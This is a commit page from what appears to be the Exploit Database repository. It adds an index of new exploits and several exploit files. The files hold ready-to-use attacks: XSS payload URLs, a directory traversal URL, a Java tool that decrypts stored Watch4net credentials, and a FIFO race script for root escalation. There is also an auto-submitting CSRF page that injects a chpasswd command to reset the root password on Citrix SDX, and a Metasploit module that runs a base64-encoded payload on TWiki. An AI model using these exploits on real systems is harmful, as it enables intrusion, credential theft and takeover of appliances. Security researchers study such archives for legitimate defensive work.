Skip to content

Commit 9a428f4

Browse files
author
Offensive Security
committed
DB: 2015-03-20
19 new exploits
1 parent 5924dde commit 9a428f4

20 files changed

Lines changed: 884 additions & 1 deletion

File tree

files.csv

Lines changed: 20 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -31582,7 +31582,7 @@ id,file,description,date,author,platform,type,port
3158231582
35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0
3158331583
35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0
3158431584
35062,platforms/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow Vulnerability",2010-12-07,"Luigi Auriemma",multiple,remote,0
31585-
35063,platforms/php/webapps/35063.txt,"Zimplit CMS zimplit.php file Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
31585+
35063,platforms/php/webapps/35063.txt,"Zimplit CMS - zimplit.php file Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
3158631586
35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
3158731587
35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0
3158831588
35066,platforms/php/webapps/35066.txt,"WordPress Processing Embed Plugin 0.5 - 'pluginurl' Parameter Cross-Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0
@@ -32844,3 +32844,22 @@ id,file,description,date,author,platform,type,port
3284432844
36421,platforms/linux/remote/36421.rb,"Exim GHOST (glibc gethostbyname) Buffer Overflow",2015-03-18,"Qualys Corporation",linux,remote,25
3284532845
36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On Stack Overflow",2015-03-18,"Core Security",windows,dos,8000
3284632846
36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection Vulnerability",2015-03-18,"Han Sahin",java,webapps,9447
32847+
36424,platforms/windows/local/36424.txt,"Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0
32848+
36425,platforms/linux/dos/36425.txt,"Linux Kernel Network Namespace Remote Denial of Service Vulnerability",2011-12-06,"Serge Hallyn",linux,dos,0
32849+
36426,platforms/multiple/remote/36426.txt,"Apache Struts 2.0.9/2.1.8 Session Tampering Security Bypass Vulnerability",2011-12-07,"Hisato Killing",multiple,remote,0
32850+
36427,platforms/windows/dos/36427.txt,"PowerDVD 11.0.0.2114 Remote Denial of Service Vulnerability",2011-12-07,"Luigi Auriemma",windows,dos,0
32851+
36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras Cross Site Scripting Vulnerability",2011-12-07,"Matt Metzger",hardware,remote,0
32852+
36429,platforms/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 Web Interface Log Viewer Page URI XSS",2011-12-08,"Silent Dream",hardware,remote,0
32853+
36430,platforms/linux/local/36430.sh,"HP Application Lifestyle Management 11 'GetInstalledPackages' Local Privilege Escalation Vulnerability",2011-12-08,anonymous,linux,local,0
32854+
36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 .tga Crash PoC",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0
32855+
36432,platforms/php/webapps/36432.txt,"Pet Listing 'preview.php' Cross Site Scripting Vulnerability",2011-12-09,Mr.PaPaRoSSe,php,webapps,0
32856+
36433,platforms/windows/dos/36433.txt,"Yahoo! CD Player ActiveX Control 'open()' Method Stack Buffer Overflow Vulnerability",2011-04-20,shinnai,windows,dos,0
32857+
36434,platforms/php/webapps/36434.txt,"WordPress GRAND FlAGallery Plugin 1.57 'flagshow.php' Cross Site Scripting Vulnerability",2011-12-12,Am!r,php,webapps,0
32858+
36435,platforms/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",php,webapps,80
32859+
36436,platforms/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps,0
32860+
36437,platforms/windows/local/36437.rb,"Publish-It PUI Buffer Overflow (SEH)",2015-03-19,metasploit,windows,local,0
32861+
36438,platforms/php/remote/36438.rb,"TWiki Debugenableplugins Remote Code Execution",2015-03-19,metasploit,php,remote,80
32862+
36439,platforms/php/webapps/36439.txt,"Joomla ECommerce-WD Plugin 1.2.5 - SQL Injection Vulnerabilities",2015-03-19,"Brandon Perry",php,webapps,80
32863+
36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080
32864+
36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443
32865+
36442,platforms/linux/webapps/36442.txt,"Citrix NITRO SDK - Command Injection Vulnerability",2015-03-19,"Han Sahin",linux,webapps,0
Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/50968/info
2+
3+
Axis M10 Series Network Cameras are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
Axis M1054 firmware 5.21 is vulnerable; other version may also be affected.
8+
9+
http://www.example.com/admin/showReport.shtml?content=serverreport.cgi&pageTitle=%3C%2Ftitle%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3B%3C%2Fscript%3E%3Ctitle%3E
Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
source: http://www.securityfocus.com/bid/50978/info
2+
3+
HS2 web interface is prone to multiple security vulnerabilities:
4+
5+
1. An HTML-injection vulnerability.
6+
2. A cross-site request-forgery vulnerability.
7+
3. A directory-traversal vulnerability.
8+
9+
Attackers can exploit these issues to perform certain actions in the context of an authorized user's session, run arbitrary HTML and script code, and transfer files outside of the web directory. Other attacks may also be possible.
10+
11+
HomeSeer HS2 2.5.0.20 is vulnerable; prior versions may also be affected.
12+
13+
http://www.example.com/example<script>alert(document.cookie)</script>

platforms/java/webapps/36436.txt

Lines changed: 70 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,70 @@
1+
Abstract
2+
3+
4+
It was discovered that EMC M&R (Watch4net) credentials of remote servers stored in Watch4net are encrypted using a fixed hardcoded password. If an attacker manages to obtain a copy of the encrypted credentials, it is trivial to decrypt them.
5+
6+
Affected products
7+
8+
9+
EMC reports that the following products are affected by this vulnerability:
10+
11+
- EMC M&R (Watch4Net) versions prior 6.5u1
12+
- EMC ViPR SRM versions prior to 3.6.1
13+
14+
See also
15+
16+
17+
- CVE-2015-0514
18+
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities
19+
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities (login required)
20+
21+
Fix
22+
23+
24+
EMC released the following updated versions that resolve this vulnerability:
25+
26+
- EMC M&R (Watch4Net) 6.5u1
27+
- EMC ViPR SRM 3.6.1
28+
29+
Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM.
30+
31+
Introduction
32+
33+
34+
EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard.
35+
36+
The Remote-Shell-Collector module from EMC M&R (Watch4net) can push and run executable files on remote hosts to collect performance data from storage environments. Remote-Shell-Collector uses SSH for this purpose.
37+
38+
In order to push and collect monitoring data, accounts are created on the remote servers and credentials of these remote servers are stored in Watch4net. These credentials are encrypted using a fixed hardcoded password. If an attacker manages to obtain a copy of the encrypted credentials, it is trivial to decrypt them.
39+
40+
Details
41+
42+
43+
Due to insecure use of cryptography the credentials of these remote host can be decrypted using the Java class com.watch4net.apg.v2.common.config.tools.Utils.process().
44+
45+
Proof of concept
46+
47+
48+
import com.watch4net.apg.v2.common.config.tools.Utils;
49+
50+
public class Watch4NetCrypt {
51+
private static void print(String out) {
52+
System.out.println(out);
53+
}
54+
55+
private static void usage() {
56+
print("Usage:\t watch4netcrypt [-e] password");
57+
print("\t watch4netcrypt [-d] encrypted");
58+
System.exit(1);
59+
}
60+
61+
public static void main(String[] args) {
62+
if (args.length != 2 || !("-e".equals(args[0]) || "-d".equals(args[0]))) {
63+
usage();
64+
}
65+
Boolean encrypt = "-e".equals(args[0]);
66+
String password = args[1];
67+
if (password != null) {
68+
print(Utils.process(password, encrypt, "centralized", null));
69+
}
70+
}

platforms/java/webapps/36440.txt

Lines changed: 45 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,45 @@
1+
Abstract
2+
3+
4+
A path traversal vulnerability was found in EMC M&R (Watch4net) Device Discovery. This vulnerability allows an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.
5+
6+
Affected products
7+
8+
9+
EMC reports that the following products are affected by this vulnerability:
10+
11+
- EMC M&R (Watch4Net) versions prior 6.5u1
12+
- EMC ViPR SRM versions prior to 3.6.1
13+
14+
See also
15+
16+
17+
- CVE-2015-0516
18+
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities
19+
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities (login required)
20+
21+
Fix
22+
23+
24+
EMC released the following updated versions that resolve this vulnerability:
25+
26+
- EMC M&R (Watch4Net) 6.5u1
27+
- EMC ViPR SRM 3.6.1
28+
29+
Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM.
30+
31+
Introduction
32+
33+
34+
EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard.
35+
36+
A path traversal vulnerability was found in M&R (Watch4net) Device Discovery. Path traversal vulnerabilities arise when user-controllable data is used insecurely within a file system operation. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file.
37+
38+
Details
39+
40+
41+
This vulnerability can be trigger via de fileFileName URL parameter of the /device-discovery/devicesource/downloadSeedFile page. An authenticated attacker can supply path traversal sequences to break out of the intended download directory and read files elsewhere on the file system. This allows the attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.
42+
43+
The following URL can be used to demonstrate this issue:
44+
45+
http://<target>:58080/device-discovery/devicesource/downloadSeedFile?fileFileName=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts

platforms/linux/dos/36425.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/50938/info
2+
3+
The Linux kernel is prone to a remote denial-of-service vulnerability.
4+
5+
An attacker can exploit this issue to cause an out-of-memory error in certain linux applications, resulting in denial-of-service conditions.
6+
7+
Linux kernel versions 2.6.35 and earlier are affected.
8+
9+
$ for i in 1 2 3 4 5 6 7 8 ; do ./feedftp $i >/dev/null & done

platforms/linux/local/36430.sh

Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
source: http://www.securityfocus.com/bid/50982/info
2+
3+
HP Application Lifestyle Management is prone to a local privilege-escalation vulnerability.
4+
5+
Local attackers can exploit this issue to execute arbitrary code with elevated privileges.
6+
7+
#!/bin/bash
8+
# Simple PoC : Run as user, when vulnerable function is called
9+
# /home/user/binary_to_run_as_root is run as root.
10+
cat > file << EOF
11+
Child Components
12+
0a29406d9794e4f9b30b3c5d6702c708
13+
\`/home/user/binary_to_run_as_root\`
14+
EOF
15+
mkfifo /tmp/tmp.txt # set trap
16+
cat /tmp/tmp.txt # blocks for victim
17+
while [ -e /tmp/tmp.txt ]; do
18+
cat file > /tmp/tmp.txt
19+
sleep 2
20+
done
21+
rm file

platforms/linux/webapps/36442.txt

Lines changed: 51 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,51 @@
1+
Abstract
2+
3+
4+
Securify discovered a command injection vulnerability in xen_hotfix page of the NITRO SDK. The attacker-supplied command is executed with elevated privileges (nsroot). This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data.
5+
6+
Tested version
7+
8+
9+
This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9, other versions may also be affected.
10+
11+
Fix
12+
13+
14+
Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.3nc.
15+
16+
Introduction
17+
18+
19+
The Citrix NetScaler SDX platform delivers fully isolated NetScaler instances running on a single appliance. Each instance is a full-blown NetScaler environment, which optimizes delivery of applications over the Internet and private networks. The NITRO SDK allows you to configure and monitor the NetScaler appliance programmatically. NITRO exposes its functionality through REST interfaces. A Cross-Site Scripting vulnerability was found in one of the REST services exposed by the NITRO SDK.
20+
21+
Administrators can upload XenServer hotfixes to the Citrix SDX appliance. The REST interface responsible for handling these hotfixes is vulnerable to command injection.
22+
23+
Details
24+
25+
26+
This vulberability exists because the file_name parameter submitted to the /nitro/v1/config/xen_hotfix page used in a shell command without proper input validation/sanitation, introducing a command execution vulnerability. The shell command is executed with elevated privileges (nsroot), which allows attackers to run arbitrary commands with these privileges. This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data.
27+
28+
The following proof of concept can be used to exploit this issue;
29+
<html>
30+
<body>
31+
<form action="https://SDXHOSTIP/nitro/v1/config/xen_hotfix" method="POST">
32+
<input type="hidden" name="object" value="&#123;"params"&#58;&#123;"action"&#58;"start"&#125;&#44;"xen&#95;hotfix"&#58;&#91;&#123;"file&#95;name"&#58;"&#46;&#46;&#47;&#46;&#46;&#47;etc&#47;passwd&#59;echo&#32;nsroot&#58;Securify&#124;chpasswd&#59;"&#125;&#93;&#125;" />
33+
<input type="submit" value="Submit request" />
34+
</form>
35+
<script>document.forms[0].submit();</script>
36+
</body>
37+
</html>
38+
39+
40+
41+
POST /nitro/v1/config/xen_hotfix HTTP/1.1
42+
-----------------------------------------
43+
44+
object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]}
45+
46+
or
47+
48+
object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"%3a"../../etc/passwd;echo nsroot:han|chpasswd;"}]}
49+
50+
51+
Due to insufficient Cross-Site Request Forgery protection, it is possible to exploit this issue by tricking a logged in admin user into visiting a specially crafted web page.
Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/50940/info
2+
3+
Apache Struts is prone to a security-bypass vulnerability that allows session tampering.
4+
5+
Successful attacks will allow attackers to bypass security restrictions and gain unauthorized access.
6+
7+
Apache Struts versions 2.0.9 and 2.1.8.1 are vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/SomeAction.action?session.somekey=someValue

platforms/php/remote/36438.rb

Lines changed: 101 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,101 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
8+
class Metasploit3 < Msf::Exploit::Remote
9+
Rank = ExcellentRanking
10+
11+
include Msf::Exploit::Remote::HttpClient
12+
13+
def initialize(info = {})
14+
super(update_info(info,
15+
'Name' => 'TWiki Debugenableplugins Remote Code Execution',
16+
'Description' => %q{
17+
TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality.
18+
The value of the debugenableplugins parameter is used without proper sanitization
19+
in an Perl eval statement which allows remote code execution
20+
},
21+
'Author' =>
22+
[
23+
'Netanel Rubin', # from Check Point - Discovery
24+
'h0ng10', # Metasploit Module
25+
26+
],
27+
'License' => MSF_LICENSE,
28+
'References' =>
29+
[
30+
[ 'CVE', '2014-7236'],
31+
[ 'OSVDB', '112977'],
32+
[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']
33+
],
34+
'Privileged' => false,
35+
'Targets' =>
36+
[
37+
[ 'Automatic',
38+
{
39+
'Payload' =>
40+
{
41+
'BadChars' => "",
42+
'Compat' =>
43+
{
44+
'PayloadType' => 'cmd',
45+
'RequiredCmd' => 'generic perl python php',
46+
}
47+
},
48+
'Platform' => ['unix'],
49+
'Arch' => ARCH_CMD
50+
}
51+
]
52+
],
53+
'DefaultTarget' => 0,
54+
'DisclosureDate' => 'Oct 09 2014'))
55+
56+
register_options(
57+
[
58+
OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]),
59+
OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin'])
60+
], self.class)
61+
end
62+
63+
64+
def send_code(perl_code)
65+
uri = target_uri.path
66+
data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit"
67+
68+
res = send_request_cgi!({
69+
'method' => 'POST',
70+
'uri' => uri,
71+
'data' => data
72+
})
73+
74+
return res
75+
end
76+
77+
78+
def check
79+
rand_1 = rand_text_alpha(5)
80+
rand_2 = rand_text_alpha(5)
81+
82+
code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")"
83+
res = send_code(code)
84+
85+
if res and res.code == 200
86+
return CheckCode::Vulnerable if res.body == rand_1 + rand_2
87+
end
88+
CheckCode::Unknown
89+
end
90+
91+
92+
def exploit
93+
code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");"
94+
code += "require('MIME/Base64.pm');MIME::Base64->import();"
95+
code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
96+
res = send_code(code)
97+
handler
98+
99+
end
100+
101+
end

0 commit comments

Comments
 (0)